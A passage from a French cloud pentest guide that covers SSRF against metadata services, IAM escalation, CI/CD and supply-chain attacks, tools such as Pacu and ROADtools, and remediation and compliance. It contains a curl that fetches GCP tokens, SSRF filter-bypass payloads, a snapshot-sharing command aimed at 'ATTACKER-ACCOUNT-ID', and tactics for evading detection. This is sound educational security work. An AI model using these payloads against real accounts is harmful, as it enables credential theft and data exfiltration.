curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Workload Identity, le mécanisme recommande par Google, associe les comptes de service Kubernetes a des comptes de service GCP de maniere granulaire, limitant l'exposition. L'absence de Workload Identity est un finding de severite haute car elle permet a tous les pods d'un noeud d'acceder aux credentials du compte de service du noeud.

L'audit RBAC Kubernetes dans GKE verifie les ClusterRoleBindings et RoleBindings pour identifier les permissions excessives. Les bindings accordant le role cluster-admin a des utilisateurs ou des comptes de service non justifies constituent un risque critique :

kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin")'

5.4 Exploitation des Cloud Functions et des services serverless GCP

Google Cloud Functions est le service de fonctions serverless de GCP. Comme AWS Lambda et Azure Functions, il execute du code en réponse a des événements, avec les memes categories de risques lies aux permissions excessives, aux variables d'environnement sensibles et aux injections d'événements.

L'enumeration des Cloud Functions s'effectue avec :

gcloud functions list --format="table(name, status, runtime, httpsTrigger.url)"

Les variables d'environnement des fonctions peuvent contenir des secrets :

gcloud functions describe FUNCTION-NAME --format="json(environmentVariables)"

Les fonctions declenchees par des HTTP triggers sans authentification sont accessibles publiquement. Les fonctions declenchees par des événements Pub/Sub, Cloud Storage ou Firestore peuvent etre manipulees si l'attaquant dispose d'un acces en ecriture a ces services sources. L'injection d'événements malveillants dans une file Pub/Sub declenchant une fonction vulnerabile a l'injection de commandes peut permettre l'execution de code dans le contexte du compte de service de la fonction.

GCP Cloud Run, l'alternative conteneurisee aux Cloud Functions, présente des vecteurs d'attaque similaires avec une surface d'attaque elargie due a la conteneurisation. L'acces au service de metadonnees depuis un conteneur Cloud Run compromis permet de recuperer le token du compte de service associe et d'escalader les privileges dans le projet GCP.

A retenir : vecteurs d'attaque communs aux trois hyperscalers

Les trois fournisseurs cloud partagent des vecteurs d'attaque fondamentaux : (1) les politiques IAM trop permissives permettant l'escalade de privileges, (2) les services de stockage mal configures exposant des donnees sensibles, (3) les services de metadonnees exploitables via SSRF pour obtenir des credentials, (4) les fonctions serverless avec des permissions excessives, et (5) les secrets stockes dans les variables d'environnement plutot que dans des coffres-forts dedies. Un pentester cloud efficace maitrise ces vecteurs sur les trois plateformes et adapte ses techniques aux specificites de chacune.

Chapitre 6 : Attaques Transversales - SSRF, Metadata Services et Privilege Escalation

Anatomie d'une attaque SSRF vers IMDS Attaquant Requete HTTP 1. SSRF Application Web Vulnerable a SSRF 2. Fetch URL IMDS 169.254.169.254 3. Credentials IAM Role Credentials AccessKey + SecretKey + Token 4. Exfiltration Attaquant Acces au compte cloud Mitigations IMDSv2 (AWS) Metadata-Flavor header (GCP) IMDS restriction (Azure) Network segmentation Input validation WAF rules

6.1 SSRF et exploitation des services de metadonnees

La Server-Side Request Forgery (SSRF) est l'une des vulnérabilités les plus critiques en environnement cloud. Elle permet a un attaquant de forcer un serveur a effectuer des requetes HTTP vers des destinations arbitraires, y compris le service de metadonnees d'instance (IMDS) accessible uniquement depuis l'instance elle-meme. L'exploitation reussie d'une SSRF vers l'IMDS permet de recuperer les credentials du role IAM associe a l'instance, constituant souvent le point d'entree vers une compromission complete du compte cloud.

La compromission de Capital One en 2019 illustre parfaitement ce scenario. L'attaquante, Paige Thompson, a exploite une SSRF dans un pare-feu applicatif web (WAF) mal configure pour acceder au service de metadonnees AWS (IMDSv1) et recuperer les credentials d'un role IAM disposant d'un acces etendu aux buckets S3 contenant les donnees de plus de 100 millions de clients. Cet incident a conduit AWS a accelerer le déploiement d'IMDSv2.

Chaque fournisseur cloud implemente son service de metadonnees differemment, mais l'adresse de base est commune : http://169.254.169.254. Sur GCP, l'adresse alternative http://metadata.google.internal est également disponible. Les endpoints critiques sont les suivants :

FournisseurEndpoint des credentialsProtection
AWS IMDSv1http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLEAucune (GET simple)
AWS IMDSv2Meme endpointToken PUT requis avec header X-aws-ec2-metadata-token
Azure IMDShttp://169.254.169.254/metadata/identity/oauth2/tokenHeader Metadata: true requis
GCPhttp://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/tokenHeader Metadata-Flavor: Google requis

Les protections d'Azure (header Metadata: true) et de GCP (header Metadata-Flavor: Google) sont contournables si la SSRF permet de definir des headers HTTP personnalises. Seul IMDSv2 d'AWS offre une protection robuste contre les SSRF classiques, car il nécessite une premiere requete PUT pour obtenir un token de session, ce qui est impossible via la plupart des SSRF basées sur des redirections ou des injections d'URL.

Les techniques avancees de SSRF incluent l'exploitation de redirections HTTP (une SSRF limitee a des domaines spécifiques peut etre redirigee vers l'IMDS si le serveur suit les redirections), l'utilisation de protocoles alternatifs (gopher://, dict://), et le DNS rebinding (resolution initiale vers une adresse autorisee, puis changement vers 169.254.169.254 lors de la seconde resolution). Les payloads SSRF typiques pour contourner les filtres incluent :

http://169.254.169.254

http://[::ffff:a9fe:a9fe] (IPv6 mapped)

http://0xa9fea9fe (notation decimale)

http://2852039166 (notation entiere)

http://169.254.169.254.nip.io (DNS wildcard)

Defense : mitigation des SSRF vers IMDS

Sur AWS, forcez l'utilisation d'IMDSv2 et definissez le hop limit a 1 pour empecher l'acces depuis les conteneurs :

aws ec2 modify-instance-metadata-options --instance-id i-xxxx --http-tokens required --http-put-response-hop-limit 1

Sur GCP, utilisez Workload Identity pour GKE et restreignez l'acces aux metadonnees avec des firewall rules internes. Sur Azure, desactivez l'IMDS pour les ressources qui n'en ont pas besoin. Sur les trois plateformes, implementez une validation stricte des entrees, un filtrage des adresses IP de destination (blocage des plages RFC 1918 et link-local) et un WAF avec des regles anti-SSRF.

6.2 Techniques d'escalade de privileges cross-service

L'escalade de privileges cross-service exploite les interactions entre différents services cloud pour obtenir des permissions superieures a celles initialement disponibles. Ces techniques sont particulierement dangereuses car elles sont souvent meconnues des équipes de sécurité qui se concentrent sur la sécurisation de chaque service individuellement sans considerer les interactions.

Sur AWS, la combinaison iam:PassRole + service de creation de ressources est le pattern d'escalade cross-service le plus courant. Un utilisateur disposant de iam:PassRole et ec2:RunInstances peut lancer une instance EC2 avec un role administrateur, puis se connecter a cette instance pour heriter des permissions du role. Le meme pattern s'applique avec Lambda (lambda:CreateFunction + lambda:InvokeFunction), Glue (glue:CreateDevEndpoint), SageMaker (sagemaker:CreateNotebookInstance) et de nombreux autres services.

Sur Azure, l'escalade cross-service exploite les relations entre Entra ID et Azure Resource Manager. Un utilisateur disposant du role User Access Administrator sur un abonnement peut s'attribuer le role Owner, obtenant ainsi un controle total. Les Managed Identities creent des chemins d'escalade lorsqu'un service disposant d'une identite geree avec des permissions limitees interagit avec un service disposant de permissions plus elevees. L'exploitation du service Automation Account est un exemple classique : un Runbook execute dans le contexte d'un Run As Account disposant de permissions Contributor peut etre utilise pour escalader les privileges.

Sur GCP, l'escalade cross-service exploite les comptes de service par defaut. Le compte de service Compute Engine par defaut dispose souvent du scope cloud-platform, donnant acces a toutes les API GCP. Un attaquant compromettant une instance Compute Engine peut exploiter ces permissions pour acceder a d'autres services. Le service Deployment Manager cree des ressources dans le contexte d'un compte de service disposant du role Editor au niveau du projet, permettant une escalade significative si un attaquant peut creer des deployments.

6.3 Attaques sur les pipelines CI/CD cloud

Les pipelines d'integration continue et de déploiement continu (CI/CD) constituent un vecteur d'attaque transversal majeur. Les services CI/CD cloud (AWS CodeBuild, Azure DevOps Pipelines, GCP Cloud Build) disposent généralement de permissions elevees pour déployer l'infrastructure et les applications, ce qui en fait des cibles de choix pour l'escalade de privileges.

L'attaque type sur un pipeline CI/CD consiste a injecter du code malveillant dans le processus de build pour exfiltrer les credentials du pipeline. Les variables d'environnement des jobs CI/CD contiennent souvent des secrets (tokens d'acces, cles d'API) et les roles IAM associes aux runners disposent de permissions de déploiement etendues. La modification d'un fichier buildspec.yml (AWS CodeBuild), d'un azure-pipelines.yml (Azure DevOps) ou d'un cloudbuild.yaml (GCP Cloud Build) peut permettre l'execution de commandes arbitraires dans le contexte privilegie du pipeline.

La technique de supply chain poisoning via les registres de packages (npm, PyPI, Maven) integres aux pipelines CI/CD est un vecteur d'attaque en expansion. L'injection d'une dependance malveillante dans un projet declenche automatiquement l'execution de code dans le pipeline CI/CD lors du build suivant, heritant des permissions du service account du pipeline.

Les GitHub Actions utilisees dans les workflows CI/CD presentent des risques similaires. Les Actions tierces malveillantes ou compromises peuvent exfiltrer les secrets du workflow. Les workflows declenches par des pull requests provenant de forks peuvent, dans certaines configurations, acceder aux secrets du repository parent. L'audit des pipelines CI/CD doit verifier le cloisonnement des secrets, les permissions des service accounts, et la provenance des actions et dependances utilisees.

"Les pipelines CI/CD sont les cles du royaume. Un attaquant qui compromet le pipeline de déploiement peut modifier l'infrastructure, injecter des backdoors dans le code applicatif et exfiltrer les secrets de production. La sécurisation des pipelines CI/CD est aussi critique que la sécurisation de l'acces administrateur au compte cloud."

-- Rami McCarthy, Security Engineer, Netflix (presentation DefCon 2023)

6.4 Exfiltration de donnees et techniques d'evasion

L'exfiltration de donnees en environnement cloud exploite les services et les canaux de communication natifs pour transferer des donnees sensibles hors du perimetre de l'organisation. Les techniques d'exfiltration cloud sont souvent plus furtives que les méthodes traditionnelles car elles utilisent des protocoles legitimes (HTTPS vers des API cloud) et des services manages qui ne font pas l'objet d'une surveillance réseau classique.

Sur AWS, les techniques d'exfiltration incluent : le partage de snapshots EBS ou RDS avec un compte externe (aws ec2 modify-snapshot-attribute --snapshot-id snap-xxxx --attribute createVolumePermission --operation-type add --user-ids ATTACKER-ACCOUNT-ID), la modification de la politique d'un bucket S3 pour autoriser l'acces depuis un compte externe, la copie de donnees vers un bucket S3 dans un autre compte, et l'utilisation de services de messagerie (SNS, SQS) pour transmettre des donnees vers des endpoints externes.

Sur Azure, l'exfiltration peut s'effectuer via le partage de disques manages, la creation de SAS tokens sur des comptes de stockage, l'envoi de donnees via Azure Event Hubs vers un namespace externe, ou l'utilisation de Logic Apps pour automatiser l'exfiltration vers des services tiers. La copie de bases de donnees Azure SQL vers un serveur externe est également possible si le pare-feu Azure SQL autorise les connexions sortantes.

Sur GCP, les techniques incluent le partage de snapshots de disques persistants avec d'autres projets, la modification des politiques IAM de buckets Cloud Storage pour autoriser l'acces depuis un projet externe, et l'utilisation de Pub/Sub pour transmettre des donnees vers des abonnements dans d'autres projets. L'export de donnees BigQuery vers un bucket Cloud Storage dans un projet controle par l'attaquant est une technique d'exfiltration de grandes quantites de donnees.

Les techniques d'evasion des mécanismes de détection incluent : la reduction du volume de donnees exfiltrees pour rester sous les seuils d'alerte, l'utilisation de canaux de communication chiffres natifs (HTTPS via les API cloud), la fragmentation des donnees sur plusieurs services et regions, et l'exploitation des delais de traitement des logs pour exfiltrer les donnees avant que les alertes ne se declenchent.

6.5 Attaques sur la chaine d'approvisionnement cloud

Les attaques sur la chaine d'approvisionnement cloud exploitent les relations de confiance entre les organisations et les services tiers integres a leur infrastructure cloud. Les images de conteneurs provenant de registres publics, les modules Terraform publies sur le Terraform Registry, les templates CloudFormation partages et les Helm charts tiers sont autant de vecteurs d'attaque par la chaine d'approvisionnement.

Les images de conteneurs malveillantes ou compromises deployees sur des clusters Kubernetes (EKS, AKS, GKE) peuvent contenir des backdoors, des mineurs de cryptomonnaie ou des mécanismes d'exfiltration de donnees. L'audit des images de conteneurs doit verifier leur provenance, leur intégrité (signatures cosign/notary) et l'absence de vulnérabilités connues (scan avec Trivy, Grype ou Clair).

Les modules Terraform ou les templates CloudFormation provenant de sources non verifiees peuvent contenir des ressources malveillantes (cles SSH supplementaires, roles IAM avec acces externe, fonctions Lambda de backdoor). L'audit de l'infrastructure as code doit verifier chaque module utilise, sa source et son intégrité. Les outils d'analyse statique de l'IaC (Checkov, tfsec, KICS) detectent certaines configurations malveillantes mais ne remplacent pas une revue manuelle des modules tiers.

Chapitre 7 : Outils du Pentester Cloud

Ecosysteme d'outils de pentest cloud Audit & Configuration ScoutSuite Multi-cloud audit Prowler AWS/Azure/GCP compliance CloudMapper AWS visualization Cartography Neo4j graph analysis Exploitation & Offensive Pacu AWS exploitation framework ROADtools Azure AD enumeration Stormspotter Azure attack graph GCPBucketBrute GCP bucket discovery IaC & CSPM Checkov IaC security scanner tfsec Terraform scanner KICS IaC multi-framework Detection de secrets truffleHog Git secrets scanner gitleaks Secrets in code enumerate-iam IAM permissions brute

7.1 ScoutSuite : audit multi-cloud

ScoutSuite, developpe par NCC Group, est un outil d'audit de sécurité multi-cloud open source qui collecte les configurations de services cloud et genere un rapport HTML interactif mettant en evidence les mauvaises configurations. Il supporte AWS, Azure, GCP, Alibaba Cloud et Oracle Cloud.

L'installation et l'execution de ScoutSuite sont straightforward :

pip install scoutsuite

scout aws --profile mon-profil

scout azure --cli

scout gcp --project-id mon-projet

ScoutSuite analyse automatiquement des dizaines de services et des centaines de regles de sécurité. Pour AWS, il couvre IAM, S3, EC2, RDS, Lambda, CloudTrail, CloudWatch, SQS, SNS, VPC, ELB, Route53, SES et de nombreux autres services. Les findings sont classes par severite (danger, warning, info) et regroupes par service, permettant une vue synthetique de la posture de sécurité du compte cloud.

Les regles de ScoutSuite sont personnalisables. Un pentester peut ajouter des regles spécifiques a son contexte d'audit ou modifier les seuils de severite des regles existantes. Le rapport HTML genere est autonome (pas de dependance réseau) et peut etre partage avec le client pour illustrer les findings. ScoutSuite est particulierement utile en phase d'enumeration pour obtenir une vue d'ensemble rapide de la configuration de sécurité avant de se concentrer sur des vecteurs d'attaque spécifiques.

7.2 Prowler : conformité et durcissement AWS/Azure/GCP

Prowler est un outil open source de verification de conformité et de sécurité pour AWS, Azure et GCP. Il execute des controles bases sur les CIS Benchmarks, les recommandations des fournisseurs cloud et les bonnes pratiques de sécurité. Prowler est plus oriente conformité que ScoutSuite, avec un support explicite des frameworks reglementaires (CIS, NIST 800-53, PCI-DSS, HIPAA, GDPR, SOC 2).

L'execution de Prowler sur AWS :

prowler aws --profile mon-profil --compliance cis_2.0_aws

Prowler v4 supporte nativement les trois hyperscalers et genere des rapports dans plusieurs formats (HTML, CSV, JSON, JUnit). L'integration avec AWS Security Hub permet de centraliser les findings Prowler avec les autres sources de detection. Pour Azure, Prowler couvre les controles CIS Azure et les recommandations Microsoft Defender for Cloud. Pour GCP, il verifie les controles CIS Google Cloud.

En contexte de pentest, Prowler est utilise pour identifier rapidement les ecarts de conformité qui revelent des faiblesses exploitables. Les controles echoues sur IAM (absence de MFA, cles d'acces non rotees, politiques trop permissives), le stockage (buckets publics, chiffrement desactive) et la journalisation (CloudTrail desactive, logs non proteges) sont autant d'indicateurs de vulnérabilités exploitables.

7.3 Pacu : framework d'exploitation AWS

Pacu, developpe par Rhino Security Labs, est le framework d'exploitation de référence pour AWS. Il fonctionne de maniere similaire a Metasploit mais cible specifiquement les services AWS. Pacu integre des modules d'enumeration, d'escalade de privileges, d'exfiltration de donnees et de persistance.

L'installation et la configuration de Pacu :

git clone https://github.com/RhinoSecurityLabs/pacu.git

cd pacu && pip install -r requirements.txt

python3 cli.py

Les modules Pacu les plus utilises en pentest incluent :

ModuleFonctionCategorie
iam__enum_users_roles_policies_groupsEnumeration complete IAMEnumeration
iam__privesc_scanDetection des chemins d'escaladeEscalade
iam__backdoor_users_keysCreation de cles d'acces persistantesPersistence
lambda__backdoor_new_rolesBackdoor via Lambda sur les nouveaux rolesPersistence
s3__download_bucketTelechargement du contenu d'un bucketExfiltration
ec2__enumEnumeration des instances EC2Enumeration
ebs__enum_snapshots_unencryptedDetection des snapshots non chiffresAudit
cloudtrail__download_event_historyTelechargement de l'historique CloudTrailForensique

Pacu gere les sessions d'audit, permettant de travailler sur plusieurs comptes AWS simultanement et de conserver l'historique des actions. Les credentials collectees au cours de l'audit sont automatiquement importees dans la session, facilitant le pivoting entre différentes identites.

7.4 ROADtools et les outils Azure AD

ROADtools (Rogue Office 365 and Azure AD tools), developpe par Dirk-jan Mollema, est la suite d'outils de référence pour l'enumeration et l'exploitation d'Azure AD (Entra ID). Elle comprend ROADrecon pour la collecte d'informations et ROADlib comme bibliotheque d'interaction avec les API Azure AD.

ROADrecon collecte l'integralite du graphe Azure AD via les API et stocke les resultats dans une base de donnees SQLite locale. L'interface web integree permet d'explorer visuellement les utilisateurs, les groupes, les applications, les service principals, les roles d'annuaire et les relations entre ces entites :

roadrecon auth -u user@domain.com -p Password123

roadrecon gather

roadrecon gui

D'autres outils complementaires pour le pentest Azure incluent AzureHound (extension de BloodHound pour Azure, permettant la visualisation des chemins d'attaque), MicroBurst (suite de scripts PowerShell pour l'enumeration et l'exploitation Azure), Stormspotter (outil Microsoft de visualisation des relations entre ressources Azure), et TokenTactics (manipulation de tokens OAuth2 Azure AD pour le phishing et le replay de tokens).

L'outil AADInternals de Nestori Syynimaa est une suite PowerShell avancee qui permet des operations offensives sur Azure AD, incluant la manipulation de la federation SAML, l'extraction de cles de chiffrement, et la creation de backdoors persistantes dans le tenant. Ces techniques sont particulierement pertinentes pour les engagements de red team ciblent les environnements Microsoft 365.

7.5 Outils supplementaires et frameworks d'automatisation

Au-dela des outils principaux, l'ecosysteme d'outils de pentest cloud s'enrichit continuellement. CloudMapper de Duo Security genere des diagrammes réseau des environnements AWS, permettant de visualiser les flux de communication et les expositions publiques. Cartography de Lyft collecte les metadonnees d'infrastructure cloud et les stocke dans une base de donnees Neo4j, permettant des requetes Cypher pour identifier les chemins d'attaque.

Cloudfox, un outil plus recent, automatise la decouverte de chemins d'attaque exploitables dans les environnements AWS et Azure. Il identifie les credentials dans les variables d'environnement, les endpoints exploitables, les politiques de confiance abusables et les chemins d'escalade de privileges. Son approche orientee attaque le distingue des outils d'audit qui se concentrent sur la conformite.

Steampipe offre une approche originale en exposant les API cloud sous forme de tables SQL. Un pentester peut interroger la configuration cloud avec des requetes SQL standards, facilitant l'analyse croisee de donnees provenant de plusieurs services. Les mods Steampipe CIS Benchmark permettent de verifier la conformité avec une simple requete SQL.

Pour la détection de secrets dans les depots de code, truffleHog v3 et gitleaks sont les outils de reference. Ils scannent l'historique Git complet pour identifier les credentials cloud commites accidentellement. L'outil git-secrets d'AWS s'integre comme hook Git pour prevenir le commit de secrets AWS.

Selection d'outils par phase de pentest

Phase de reconnaissance : cloud_enum, truffleHog, gitleaks, Shodan, Censys. Phase d'enumeration : ScoutSuite, Prowler, ROADtools, enumerate-iam, Cartography. Phase d'exploitation : Pacu (AWS), AADInternals (Azure), gcp_enum (GCP). Phase de post-exploitation : Cloudfox, CloudMapper, Steampipe. Phase de reporting : ScoutSuite (rapport HTML), Prowler (rapport de conformite). Combinez ces outils pour une couverture complete de l'audit.

Chapitre 8 : Securisation Post-Audit - Remediation et Durcissement

Cycle de remediation post-audit 1. Priorisation 2. Remediation 3. Verification 4. Durcissement 5. Monitoring 6. Re-audit Amelioration continue

8.1 Priorisation des remediations

La priorisation des remediations post-audit est une étape critique qui determine l'efficacite du processus d'amelioration. Les vulnérabilités identifiées lors du pentest doivent etre classees selon une matrice combinant la severite technique (score CVSS ou equivalent), la probabilite d'exploitation (accessibilite, complexite, prerequis), l'impact metier (donnees affectees, services impactes, consequences reglementaires) et le cout de remediation (effort technique, risque de regression, delai de mise en oeuvre).

Les remediations critiques a traiter en priorite absolue incluent : les acces administrateur non protege par MFA, les credentials exposees publiquement (cles d'acces dans des depots Git, buckets S3 publics contenant des secrets), les services de metadonnees accessibles via des SSRF demontrees, et les chemins d'escalade de privileges directs vers un acces administrateur. Ces vulnérabilités doivent etre corrigees dans les 24 a 48 heures suivant la communication du rapport.

Les remediations de severite haute incluent : les roles IAM avec des permissions excessives, les buckets de stockage exposes publiquement (sans donnees sensibles immédiatement identifiees), l'absence de chiffrement sur les donnees au repos et en transit, les configurations réseau permissives (groupes de sécurité ouverts), et l'absence de journalisation sur les services critiques. Le delai recommande est de une a deux semaines.

Les remediations de severite moyenne et basse concernent les ecarts par rapport aux bonnes pratiques qui ne presentent pas de risque d'exploitation immediate : absence de rotation automatique des credentials, configurations de logging incompletes, tags de sécurité manquants, et absence de politiques de retention des donnees. Le delai recommande est de un a trois mois.

8.2 Durcissement IAM multi-cloud

Le durcissement IAM est la remediation la plus impactante car la gestion des identites et des acces est le vecteur d'attaque principal dans les environnements cloud. Les principes de durcissement sont communs aux trois hyperscalers, meme si les implementations différent.

Sur AWS, le durcissement IAM inclut : l'activation de MFA sur tous les comptes utilisateurs (en priorite le compte root), la suppression des cles d'acces longue duree au profit des roles IAM et des credentials temporaires, l'application des permissions boundaries pour limiter les droits maximaux, l'implementation de SCP au niveau de l'organisation pour interdire les actions dangereuses, et l'utilisation d'IAM Access Analyzer pour identifier les permissions non utilisees :

aws iam generate-service-last-accessed-details --arn arn:aws:iam::123456789012:user/nom-utilisateur

Sur Azure, le durcissement Entra ID inclut : l'activation de MFA pour tous les utilisateurs (via Conditional Access Policies plutot que par utilisateur), la configuration de Privileged Identity Management (PIM) pour les roles privilegies (activation just-in-time avec approbation), la restriction des consentements d'application (interdiction du consentement utilisateur, validation par un administrateur), la revue reguliere des attributions de roles (Access Reviews) et la configuration de politiques d'acces conditionnel basées sur le risque (sign-in risk, user risk).

Sur GCP, le durcissement IAM inclut : la suppression des roles de base (Owner, Editor, Viewer) au profit de roles predefinies granulaires, l'activation de l'authentification multi-facteur pour tous les comptes Google, la restriction de la creation de cles de compte de service, l'utilisation de Workload Identity Federation pour l'acces depuis l'exterieur de GCP (au lieu de cles de compte de service), et l'implementation de VPC Service Controls pour limiter l'exfiltration de donnees.

8.3 Securisation du stockage cloud

La sécurisation du stockage cloud couvre le chiffrement, le controle d'acces, la journalisation et la protection contre l'exfiltration. Chaque fournisseur propose des mécanismes natifs qui doivent etre actives et configures correctement.

Sur AWS S3, les mesures de sécurisation essentielles incluent : l'activation de S3 Block Public Access au niveau du compte (aws s3control put-public-access-block --account-id ACCOUNT-ID --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true), l'activation du chiffrement par defaut (SSE-S3 ou SSE-KMS), l'activation du versioning et de l'Object Lock pour la protection contre la suppression malveillante, et l'activation de la journalisation des acces S3 (server access logging ou CloudTrail data events).

Sur Azure Storage, la sécurisation inclut : la desactivation de l'acces anonyme aux conteneurs Blob, l'activation du chiffrement avec des cles gerees par le client (CMK via Key Vault), la restriction de l'acces réseau via des endpoints prives et des regles de pare-feu, la configuration de la politique de retention avec verrouillage d'immutabilite, et l'audit regulier des SAS tokens emis.

Sur GCP Cloud Storage, la sécurisation inclut : l'activation de l'acces uniforme au niveau du bucket (Uniform Bucket-Level Access), la desactivation de l'acces public, l'activation du chiffrement avec des cles gerees par le client (CMEK via Cloud KMS), la configuration de la retention des objets et des verrouillages de bucket, et l'activation de la journalisation des acces via Cloud Audit Logs.

8.4 Surveillance et détection continue

La mise en place d'une surveillance continue apres l'audit est essentielle pour maintenir la posture de sécurité dans le temps. Les environnements cloud evoluent rapidement, et de nouvelles mauvaises configurations peuvent etre introduites a chaque deploiement.

Sur AWS, la surveillance s'appuie sur : AWS CloudTrail pour la journalisation des appels API, Amazon CloudWatch pour les metriques et les alertes, AWS Config pour la surveillance des modifications de configuration avec des regles de conformite, AWS GuardDuty pour la détection des menaces (comportements anormaux, acces depuis des IP malveillantes), et AWS Security Hub pour l'agregation et la priorisation des findings de sécurité.

Sur Azure, la surveillance utilise : Azure Monitor pour les logs et les metriques, Microsoft Defender for Cloud pour la détection des menaces et les recommandations de sécurité, Azure Policy pour l'application automatique des configurations de sécurité, Azure Sentinel (Microsoft Sentinel) pour le SIEM cloud et la correlation des événements, et Azure AD Identity Protection pour la détection des compromissions d'identite.

Sur GCP, la surveillance s'appuie sur : Cloud Audit Logs pour la journalisation des acces, Cloud Monitoring pour les metriques et les alertes, Security Command Center pour la détection des vulnérabilités et des menaces, et Chronicle Security Operations pour l'analyse des logs de sécurité a grande echelle.

Les alertes critiques a configurer en priorite incluent : la creation ou la modification de roles IAM privilegies, la desactivation de la journalisation, l'exposition publique de ressources de stockage, la creation de cles d'acces pour des comptes de service, l'ajout de regles de pare-feu autorisant l'acces depuis Internet, et les connexions depuis des geolocalisations inhabituelles.

Defense : configuration des alertes critiques sur AWS

Configurez des metriques CloudWatch et des alertes SNS pour les événements CloudTrail suivants : ConsoleLogin sans MFA, StopLogging ou DeleteTrail sur CloudTrail, PutBucketPolicy avec des permissions publiques sur S3, CreateAccessKey pour le compte root, AttachRolePolicy avec la politique AdministratorAccess, et AuthorizeSecurityGroupIngress avec 0.0.0.0/0 sur les ports sensibles. Ces alertes permettent de détecter en temps reel les tentatives de compromission et les mauvaises configurations introduites par erreur.

Chapitre 9 : Conformité Cloud - CIS Benchmarks, CSA CCM et SOC 2

Referentiels de conformité cloud CIS Benchmarks AWS Foundations v3.0 Azure Foundations v2.1 GCP Foundations v2.0 Kubernetes v1.9 CSA CCM v4 197 controles 17 domaines STAR Certification CAIQ auto-evaluation SOC 2 Type II Sécurité Disponibilite Intégrité du traitement Confidentialite / Vie privee Normes et reglementations applicables ISO 27017/27018 RGPD/GDPR NIS2 / DORA PCI DSS v4.0 SecNumCloud Le pentest cloud valide la conformité operationnelle Verification technique des controles declares dans les referentiels

9.1 CIS Benchmarks pour le cloud

Les CIS Benchmarks (Center for Internet Security) sont les referentiels de configuration securisee les plus utilises pour les environnements cloud. Ils fournissent des recommandations detaillees et prescriptives pour la configuration de chaque service cloud, organisees en controles verifiables automatiquement. Chaque controle est accompagne d'une description, d'une justification, d'une procedure d'audit et d'une procedure de remediation.

Le CIS AWS Foundations Benchmark v3.0 couvre les domaines suivants : Identity and Access Management (activation de MFA, politique de mot de passe, rotation des cles d'acces, principe du moindre privilege), Logging (configuration de CloudTrail, integration avec CloudWatch, activation du logging S3), Monitoring (alertes sur les modifications de configuration critiques), Networking (configuration des VPC, groupes de sécurité, Network ACLs) et Storage (chiffrement S3, Block Public Access). Le benchmark comprend environ 60 controles repartis en deux niveaux : Level 1 (recommandations de base applicables sans impact operationnel) et Level 2 (recommandations avancees pouvant avoir un impact sur la fonctionnalite).

Le CIS Azure Foundations Benchmark v2.1 couvre des domaines similaires adaptes a l'ecosysteme Azure : Identity and Access Management (configuration d'Entra ID, MFA, acces conditionnel), Security Center (activation de Microsoft Defender for Cloud, configuration des alertes), Storage Accounts (chiffrement, acces réseau, SAS tokens), Database Services (configuration de sécurité Azure SQL, Cosmos DB), Logging and Monitoring (configuration des diagnostic settings, Azure Monitor) et Networking (NSG, Azure Firewall, Private Endpoints).

Le CIS Google Cloud Platform Foundations Benchmark v2.0 couvre : Identity and Access Management (configuration IAM GCP, comptes de service, Workload Identity), Logging and Monitoring (Cloud Audit Logs, Cloud Monitoring), Networking (VPC, firewall rules, Private Google Access), Virtual Machines (configuration Compute Engine, chiffrement, metadonnees), Storage (Cloud Storage ACLs, chiffrement CMEK) et Cloud SQL (configuration de sécurité des instances de bases de donnees).

L'outil Prowler automatise la verification des controles CIS sur les trois hyperscalers. La commande suivante execute une verification CIS complete sur un compte AWS :

prowler aws --compliance cis_2.0_aws --output-formats html json csv

Niveaux de maturite CIS

Les CIS Benchmarks distinguent deux niveaux de profil. Le Level 1 regroupe les controles de sécurité essentiels qui peuvent etre implementes sans impact significatif sur la fonctionnalite du système. Le Level 2 ajoute des controles plus restrictifs qui peuvent avoir un impact operationnel mais offrent une sécurité renforcee. En contexte de pentest, les ecarts par rapport au Level 1 constituent généralement des findings de severite moyenne a haute, tandis que les ecarts par rapport au Level 2 sont des findings de severite faible a moyenne. La cible de conformité (Level 1 ou Level 2) doit etre definie avec le commanditaire de l'audit en debut de mission.

9.2 CSA Cloud Controls Matrix (CCM)

La Cloud Security Alliance (CSA) Cloud Controls Matrix (CCM) v4 est un referentiel de controles de sécurité specifiquement concu pour les environnements cloud. Il comprend 197 controles organises en 17 domaines couvrant l'ensemble des aspects de la sécurité cloud, de la gouvernance a la technique. Le CCM est concu pour etre utilise en complement des normes existantes (ISO 27001, NIST, PCI DSS) et fournit un mapping explicite vers ces normes.

Les 17 domaines du CCM v4 couvrent : Audit and Assurance (A&A), Application and Interface Security (AIS), Business Continuity Management and Operational Resilience (BCR), Change Control and Configuration Management (CCC), Cryptography, Encryption and Key Management (CEK), Datacenter Security (DCS), Data Security and Privacy Lifecycle Management (DSP), Governance, Risk and Compliance (GRC), Human Resources (HRS), Identity and Access Management (IAM), Interoperability and Portability (IPY), Infrastructure and Virtualization Security (IVS), Logging and Monitoring (LOG), Security Incident Management (SEF), Supply Chain Management (SCS), Threat and Vulnerability Management (TVM), et Universal Endpoint Management (UEM).

Le programme CSA STAR (Security, Trust, Assurance and Risk) offre trois niveaux de certification : Level 1 (auto-evaluation via le Consensus Assessments Initiative Questionnaire ou CAIQ), Level 2 (audit par un tiers base sur le CCM), et Level 3 (surveillance continue). En contexte de pentest, le CCM fournit un cadre d'evaluation complementaire aux CIS Benchmarks, couvrant des aspects organisationnels et de gouvernance que les benchmarks techniques n'adressent pas.

Le pentest cloud contribue directement a la verification de plusieurs domaines du CCM. Le domaine IAM est valide par l'audit des politiques d'acces et la recherche de chemins d'escalade de privileges. Le domaine IVS est valide par l'evaluation de la segmentation réseau et de l'isolation des workloads. Le domaine DSP est valide par la verification du chiffrement et des controles d'acces aux donnees. Le domaine LOG est valide par l'audit de la configuration de journalisation et de la détection des menaces.

9.3 SOC 2 et les audits de conformité cloud

SOC 2 (Service Organization Control 2) est un cadre d'audit developpe par l'AICPA (American Institute of Certified Public Accountants) qui evalue les controles de sécurité d'une organisation en fonction de cinq Trust Service Criteria : sécurité, disponibilite, intégrité du traitement, confidentialite et vie privee. L'audit SOC 2 Type II evalue non seulement la conception des controles mais aussi leur efficacité operationnelle sur une periode donnee (generalement 6 a 12 mois).

